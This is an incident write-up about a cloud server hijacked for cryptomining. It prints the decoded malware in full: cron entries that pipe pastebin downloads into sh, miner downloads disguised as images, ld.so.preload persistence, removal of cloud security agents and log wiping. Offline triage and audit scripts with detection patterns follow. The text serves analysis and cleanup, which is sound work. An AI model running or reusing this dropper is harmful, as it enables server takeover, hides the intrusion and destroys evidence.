An ECS instance was hijacked for cryptomining. It contained a strange file that looked like Base64-encoded data, and the crontab carried this scheduled task (note the two different pastebin IDs in the curl and wget fallbacks):

```
*/23 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/tRxfvbYN)|sh
```

The file was indeed Base64-encoded; decoding it through an online Base64 decoder produced the following script (reflowed here into one statement per line, with the original's command names restored to their proper case; the awk field numbers, the `--connect-timeout` values and the inner Python payload were damaged in the copy and are left as found):
```bash
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Kill competing miners and remove their files, then kill anything
# connected to known pool IPs/ports; if the script's own miner (kworkerds)
# is not running, kill any process above 90% CPU.
function kills() {
pkill -f sourplum
pkill wntkyg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wntkyg
rm -rf /tmp/qw3xt.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wntkyg /tmp/2t3ik
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigdaemon"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigminer"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/java"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "qw3xt"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/sustes"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "xbash"|awk '{print $}'|xargs kill -9
ps auxf|grep -v grep|grep "hashfish"|awk '{print $}'|xargs kill -9
pkill -f biosetjenkins
pkill -f anxqv.yam
pkill -f xmrigdaemon
pkill -f xmrigminer
pkill -f xmrig
pkill -f loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f jnkihgjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f nxlai
pkill -f bi5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wntkyg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f xbashy
pkill -f libapache
pkill -f qw3xt.2
pkill -f /usr/bin/.sshd
pkill -f sustes
pkill -f xbash
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so
rm -rf /tmp/.systemd-private-*
chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
netstat -anp | grep 69.28.55.86:443 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :4444 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :14444 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :14433 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
netstat -anp | grep :13531 | awk '{print $7}' | awk -F'[/]' '{print $}' | xargs kill -9
p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)
if [ ${p} -eq 0 ]; then
    ps auxf|grep -v grep | awk '{if($3>=90.0) print $}' | xargs kill -9
fi
}

# Persistence 1: drop /bin/httpdns and schedule it from /etc/crontab.
function system() {
if [ ! -f "/bin/httpdns" ]; then
    curl -fsSL --connect-timeout https://pastebin.com/raw/CnPtQ2tM -o /bin/httpdns && chmod 755 /bin/httpdns
    if [ ! -f "/bin/httpdns" ]; then
        wget https://pastebin.com/raw/CnPtQ2tM -O /bin/httpdns && chmod 755 /bin/httpdns
    fi
    if [ ! -f "/etc/crontab" ]; then
        echo -e "0 1 * * * root httpdns" > /etc/crontab
    else
        sed -i '$d' /etc/crontab && echo -e "0 1 * * * root httpdns" >> /etc/crontab
    fi
fi
}

# Persistence 2: install a shared library (served as a .jpg) and register it
# in /etc/ld.so.preload, then timestomp both files to match /bin/sh.
function top() {
mkdir -p /usr/local/lib/
if [ ! -f "/usr/local/lib/libdns.so" ]; then
    curl -fsSL --connect-timeout https://master.minerxmr.ru/y/1539580368x-1566688371.jpg -o /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so
    if [ ! -f "/usr/local/lib/libdns.so" ]; then
        wget https://master.minerxmr.ru/y/1539580368x-1566688371.jpg -O /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so
    fi
fi
echo /usr/local/lib/libdns.so > /etc/ld.so.preload
touch -acmr /bin/sh /etc/ld.so.preload
touch -acmr /bin/sh /usr/local/lib/libdns.so
}

# Secondary stage: a Base64-wrapped Python payload run in the background
# (the encoded string was case-mangled in the copy and no longer decodes).
function python() {
nohup python -c "import base64;exec(base64.b64decode('I2nvzgluzzogdxRmltgkaw1wb3j0ihvybgxpygppbxbvcnqgymfzzty0cgpkpsanahr0chm6ly9wyxn0zwjpbi5jb20vcmf3l1zwddi3tgvijwp0cnk6ciagicbwywdlpwjhc2u2nc5injrkzwnvzguodxjsbglilnvybg9wzw4ozckucmvhzcgpkqogicagzxhlyyhwywdlkqplegnlchq6ciagicbwyxnz'))" >/dev/null 2>&1 &
touch /tmp/.pythong
}

# Persistence 3: the same download-and-pipe-to-sh entry in every cron
# location (system cron.d, root's spools, hourly/daily/monthly), all
# timestomped to /bin/sh.
function echocron() {
echo -e "*/10 * * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /etc/cron.d/root
echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /etc/cron.d/apache
echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
curl -fsSL --connect-timeout https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner
if [ ! -f "/etc/cron.hourly/oanacroner" ]; then
    wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner
fi
mkdir -p /etc/cron.daily
curl -fsSL --connect-timeout https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner
if [ ! -f "/etc/cron.daily/oanacroner" ]; then
    wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner
fi
mkdir -p /etc/cron.monthly
curl -fsSL --connect-timeout https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner
if [ ! -f "/etc/cron.monthly/oanacroner" ]; then
    wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner
fi
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/apache
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /etc/cron.hourly/oanacroner
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.monthly/oanacroner
}

# Close Redis (6379) to everyone but localhost, presumably to lock out rivals.
function tables() {
iptables -I INPUT -p tcp --dport 6379 -j REJECT
iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
iptables-save
touch /tmp/.tables
}

# Remove the Alibaba Cloud (Aegis) and Tencent Cloud (Yunjing) host agents.
function uninstall() {
if ps aux | grep -i '[a]liyun'; then
    wget http://update.aegis.aliyun.com/download/uninstall.sh
    chmod +x uninstall.sh
    ./uninstall.sh
    wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
    chmod +x quartz_uninstall.sh
    ./quartz_uninstall.sh
    rm -f uninstall.sh quartz_uninstall.sh
    pkill aliyun-service
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
elif ps aux | grep -i '[y]unjing'; then
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/yunjing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
touch /tmp/.uninstall
}

# Miner stage 1: /tmp/kworkerds, started only if nothing listens on 56415.
function downloadrun() {
ps=$(netstat -an | grep :56415 | wc -l)
if [ ${ps} -eq 0 ]; then
    if [ ! -f "/tmp/kworkerds" ]; then
        curl -fsSL --connect-timeout https://master.minerxmr.ru/y/1539875788x-1404792658.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
        if [ ! -f "/tmp/kworkerds" ]; then
            wget https://master.minerxmr.ru/y/1539875788x-1404792658.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
        fi
        nohup /tmp/kworkerds >/dev/null 2>&1 &
    else
        nohup /tmp/kworkerds >/dev/null 2>&1 &
    fi
fi
}

# Miner stage 2: /var/tmp/kworkerds plus its config.json; the three
# architecture branches fetch the same file.
function downloadrunxm() {
mkdir -p /var/tmp
chmod 1777 /var/tmp
pm=$(netstat -an | grep :56415 | wc -l)
if [ ${pm} -eq 0 ]; then
    rm -rf /var/tmp/config.json*
    curl -fsSL --connect-timeout https://master.minerxmr.ru/y/1539581805x1822611359.jpg -o /var/tmp/config.json && chmod +x /var/tmp/config.json
    if [ ! -f "/var/tmp/config.json" ]; then
        wget https://master.minerxmr.ru/y/1539581805x1822611359.jpg -O /var/tmp/config.json && chmod +x /var/tmp/config.json
    fi
    ARCH=$(uname -i)
    if [ "$ARCH" == "x86_64" ]; then
        rm -rf /var/tmp/kworkerds*
        curl -fsSL --connect-timeout https://master.minerxmr.ru/y/1539592750x-1566688347.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
        if [ ! -f "/var/tmp/kworkerds" ]; then
            wget https://master.minerxmr.ru/y/1539592750x-1566688347.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
        fi
        nohup /var/tmp/kworkerds >/dev/null 2>&1 &
    elif [ "$ARCH" == "i386" ]; then
        rm -rf /var/tmp/kworkerds*
        curl -fsSL --connect-timeout https://master.minerxmr.ru/y/1539592750x-1566688347.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
        if [ ! -f "/var/tmp/kworkerds" ]; then
            wget https://master.minerxmr.ru/y/1539592750x-1566688347.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
        fi
        nohup /var/tmp/kworkerds >/dev/null 2>&1 &
    else
        rm -rf /var/tmp/kworkerds*
        curl -fsSL --connect-timeout https://master.minerxmr.ru/y/1539592750x-1566688347.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
        if [ ! -f "/var/tmp/kworkerds" ]; then
            wget https://master.minerxmr.ru/y/1539592750x-1566688347.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
        fi
        nohup /var/tmp/kworkerds >/dev/null 2>&1 &
    fi
fi
}

# Main: a pastebin "kill switch" decides whether to only refresh cron or to
# run the full chain; logs and root's mailbox are wiped at the end.
mkdir -p /tmp
chmod 1777 /tmp
update=$(curl -fsSL --connect-timeout https://pastebin.com/raw/SSCy7mY7)
if [ ${update}x = "update"x ]; then
    echocron
else
    if [ ! -f "/tmp/.uninstall" ]; then
        uninstall
    fi
    if [ ! -f "/tmp/.tables" ]; then
        tables
    fi
    if [ ! -f "/tmp/.pythong" ]; then
        rm -rf /tmp/.pythonf
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep
    port=$(netstat -an | grep :56415 | wc -l)
    if [ ${port} -eq 0 ]; then
        downloadrunxm
    fi
    echo 0 > /var/spool/mail/root
    echo 0 > /var/log/wtmp
    echo 0 > /var/log/secure
    echo 0 > /var/log/cron
fi
#
```
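Pasting an incident artifact into an online decoder hands it to a third party; the same triage can be done offline. The helper below is an added example, not part of the original post: it decodes a Base64-wrapped dropper to a file and lists the URLs, IP addresses, cron schedules and written file paths it contains, without ever executing it. The sample script embedded in the usage at the end is constructed for the demonstration (placeholder hosts, same shape as the script above) and is not the real payload.

```shell
#!/bin/sh
# Added example (not from the original post): offline triage of a Base64
# dropper. Only reads the decoded text; nothing here runs the payload.

# decode_payload IN OUT: Base64-decode IN into OUT. Written to a file so it
# can be read; never piped into sh.
decode_payload() {
  base64 -d "$1" > "$2"
}

# urls FILE: unique http(s) URLs the script downloads from.
urls() {
  grep -Eo 'https?://[A-Za-z0-9._~/-]+' "$1" | sort -u
}

# ips FILE: unique dotted IPv4 addresses (pool or C2 candidates).
ips() {
  grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' "$1" | sort -u
}

# cron_lines FILE: lines that contain a five-field cron schedule such as
# "*/23 * * * *" or "0 1 * * *".
cron_lines() {
  grep -E '(^|[" ])(\*(/[0-9]+)?|[0-9]+)( (\*(/[0-9]+)?|[0-9]+)){4} ' "$1"
}

# written_files FILE: targets of -o / -O / > redirections under absolute
# paths, i.e. the files the script creates (persistence candidates).
written_files() {
  grep -Eo '(-o|-O|>>?) */[A-Za-z0-9._/-]+' "$1" \
    | sed -E 's/^(-o|-O|>>?) *//' \
    | grep -v '^/dev/null$' \
    | sort -u
}

# Usage against a real artifact:  sh triage.sh /path/to/suspect.b64
if [ "$#" -gt 0 ]; then
  decoded=$(mktemp)
  decode_payload "$1" "$decoded"
  echo "== URLs ==";          urls "$decoded"
  echo "== IPv4 ==";          ips "$decoded"
  echo "== cron entries =="; cron_lines "$decoded"
  echo "== files written =="; written_files "$decoded"
  rm -f "$decoded"
fi
```

The URL and path lists are what goes into egress blocks and the cleanup checklist; the cron and IP lists are what a host-wide sweep should grep for. Keep the decoded file around for comparison against later copies of the same cron payload, since the operator in this case already rotates pastebin IDs between the curl and wget fallbacks.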
To clean this up completely, inspect the system's scheduled tasks (cron) and the DNS-named files the script plants. Relevant locations:

```
/etc/cron*
/var/spool/cron/root
```

Files that may be malicious:

```bash
/usr/local/lib/libdns.so
/etc/ld.so.preload
/bin/dns
/usr/sbin/netdns
/etc/init.d/netdns (/etc/rc.d/init.d/netdns)
```

Also empty the /tmp directory.
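The cleanup list above can be turned into a repeatable check. The script below is an added example, not part of the original post: it looks for the cron entries the dropper writes, a populated /etc/ld.so.preload, and the files listed as possibly abnormal. The ROOT prefix argument is an assumption of this example, so the same checks can be run against a mounted disk image (or, as in the test, a constructed directory tree); the file paths themselves come from the decoded script and the list above.

```shell
#!/bin/sh
# Added example (not from the original post): audit a host or a mounted
# image for the persistence artifacts described in the post.

# Cron files the dropper writes (system cron.d, root's spools, and the
# "oanacroner" copies in cron.hourly/daily/monthly).
CRON_FILES="/etc/crontab /etc/cron.d/root /etc/cron.d/apache \
/var/spool/cron/root /var/spool/cron/crontabs/root \
/etc/cron.hourly/oanacroner /etc/cron.daily/oanacroner /etc/cron.monthly/oanacroner"

# Paths from the post's cleanup list plus the dropper's own targets and
# marker files.
SUSPECT_FILES="/usr/local/lib/libdns.so /bin/dns /usr/sbin/netdns \
/etc/init.d/netdns /etc/rc.d/init.d/netdns /bin/httpdns \
/tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json \
/tmp/.tables /tmp/.uninstall /tmp/.pythong"

# "download and pipe straight into a shell" cron entries.
PIPE_TO_SH='pastebin\.com|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'

# check_cron ROOT: print offending cron lines; exit 0 if any found, 1 if clean.
check_cron() {
  root=${1:-}
  found=1
  for f in $CRON_FILES; do
    [ -f "$root$f" ] || continue
    if grep -Eq "$PIPE_TO_SH" "$root$f"; then
      echo "suspicious cron file: $root$f"
      grep -E "$PIPE_TO_SH" "$root$f" | sed 's/^/    /'
      found=0
    fi
  done
  return $found
}

# check_preload ROOT: /etc/ld.so.preload is empty or absent on a clean
# server; every library listed there is loaded into every dynamically
# linked program. Exit 0 if it has content, 1 otherwise.
check_preload() {
  root=${1:-}
  p="$root/etc/ld.so.preload"
  [ -s "$p" ] || return 1
  echo "ld.so.preload is populated: $p"
  sed 's/^/    /' "$p"
  return 0
}

# count_suspect_files ROOT: print how many listed paths exist (stdout);
# the names go to stderr so the count stays machine-readable.
count_suspect_files() {
  root=${1:-}
  n=0
  for f in $SUSPECT_FILES; do
    if [ -e "$root$f" ]; then
      echo "suspect file present: $root$f" >&2
      n=$((n + 1))
    fi
  done
  echo "$n"
}

# check_listener: the miner is only (re)started when nothing listens on
# TCP 56415, so an open 56415 is a cheap live indicator. Live host only.
check_listener() {
  ss -ltn 2>/dev/null | grep -q ':56415[[:space:]]'
}

# Live usage:  sh audit.sh /        or, for a mounted image:  sh audit.sh /mnt/img
if [ "$#" -gt 0 ]; then
  check_cron "$1" || echo "no piped-to-shell cron entries under $1"
  check_preload "$1" || echo "ld.so.preload empty or absent under $1"
  echo "suspect files present: $(count_suspect_files "$1")"
  check_listener && echo "something is listening on tcp/56415"
fi
```

Because anything in /etc/ld.so.preload is injected into every dynamically linked program, including ps, netstat and ls, results from the live host are only as trustworthy as the tools producing them; where possible run the checks against a snapshot or mounted image through the ROOT prefix, or from statically linked tools. After removal, re-run the cron check: the dropper rewrites its entries from several cron locations, so one surviving copy restores all the others.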
Summary: the ECS server was hijacked by a cryptomining script, with CPU load at 100%.